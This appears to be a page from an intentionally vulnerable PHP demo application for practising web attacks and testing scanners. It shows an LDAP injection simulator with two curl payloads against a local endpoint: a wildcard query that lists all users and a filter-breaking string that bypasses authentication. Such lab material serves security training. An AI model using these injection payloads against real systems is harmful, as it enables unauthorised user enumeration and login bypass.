WARNING: This is not a real shop. This is an example PHP application which is intentionally vulnerable to web attacks.
It is intended to help you test security scanners and practice manual hacking skills.
Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.
LDAP Injection Simulator
LDAP Injection Tests
Injection Payloads
curl Test
# LDAP wildcard — get all users
curl "http://localhost/ldap.php?username=*"
# LDAP injection bypass
curl "http://localhost/ldap.php?username=*)(uid=*))(|(uid=*"